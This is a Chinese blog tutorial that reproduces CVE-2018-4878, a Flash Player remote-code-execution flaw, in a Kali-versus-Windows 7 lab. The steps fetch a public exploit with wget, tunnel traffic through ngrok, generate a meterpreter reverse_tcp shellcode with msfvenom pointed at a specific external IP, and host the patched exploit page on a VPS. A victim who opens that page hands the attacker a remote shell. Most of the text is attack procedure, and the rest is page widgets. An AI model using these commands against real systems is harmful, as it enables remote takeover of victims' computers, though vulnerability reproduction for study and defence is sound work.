CVE-2018-4878的复现

前言:

CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。

1 漏洞影响范围

Flash Player28.0.0.137及以前的所有版本

2 漏洞复现

2.1 测试环境

攻击机:kali2017

靶机:win7_x64+IE8+FLASH_player28.0.0.137

 

2.2 复现过程

1.在github上面下载cve-2018-4878的exp并解压

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

 

2.用ngrok配置内网穿透

这里的作用是将tcp://0.tcp.ngrok.io:10270的流量转发到本地的1234端口

我们再ping一下得到ip

3.用msfvenom生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=52.14.61.47 lport=10270 -f python>/var/shellcode.txt

 

4.修改exp

复制我们生成的shellcode

用vim打开我们的cve-2018-4878.py,然后用我们刚才生成的shellcode替换开头的shellcode

然后将stageless的值改为false

修改文件路径为我们的解压路径

然后将解压路径下的exp测试弹出文件夹下的index.html和exploit.swf复制到解压路径

然后运行python cve-2018-4878.py

5.msf配置监听

运行msfconsole

然后设置paylaod,监听地址,监听端口

等待肉鸡上线

 

6.复制文件到vps上面,用靶机访问,完成复现

我们可以通过winscp将我们生成的exploit.swf和index.html复制到vps的html目录下

然后用靶机访问页面

然后会返回一个session

然后可以通过sessions -i命令进入meterpreter

复现成功

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值